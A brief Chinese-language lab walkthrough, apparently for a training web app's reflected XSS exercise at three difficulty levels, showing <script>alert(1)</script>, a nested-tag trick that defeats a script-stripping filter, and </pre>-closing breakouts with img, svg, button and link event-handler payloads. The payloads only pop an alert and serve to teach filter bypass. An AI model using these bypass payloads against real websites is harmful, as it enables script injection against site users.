Low
1、看到这里,这个输入框就是“入口”,输入探测123“出口”的位置
2、直接上payload: <script>alert(1)</script> 
3、结果:
4、这里我们可以去查看一下源码的结构,已经成功插入了一个<script>标签
Medium
1、话不多说,直接勒特 <script>alert(1)</script> 从源代码中苦于看到 <script>被吃了一半
2、不要慌,喜欢吃就多给它一个<script><script>alert(1)</script>
3、从结果中看到被它挨个吃了!!而且吃头不吃尾巴!,那就把他们混起来给他吃<scr<script>ipt>alert(1)</script>,
4、我们来看一下原代码 :这会儿吃撑了,吐了一个出来,通关~
Hight
1、勒特:<script>alert(1)</script> 这次吃得干干净净
2、这个时候,你会发现,怎么塞它都给你吐一个 “>” 出来!说明得换个方法
思路——很能吃,是个无底洞,所以得把它封起 ! </pre> 让它的嘴闭起来
3、尝试:上马桶塞堵嘴 </pre> 堵嘴 <!--
从前后端的代码看,似乎是堵住了。
- </pre>这个标签是与前面的形成闭合
- <!-- 这个马桶塞是注释后面多余的代码,不用也可!
4、好了,上才艺:
</pre> <img src='1' οnclick='alert(1)'><!--
</pre> <svg src='1' οnlοad='alert(1)'><!--
</pre><button οnclick='alert(1)'>老六</button><!--
</pre><a href='1' οnclick='alert(1)'>老六</a><!--
花式通关
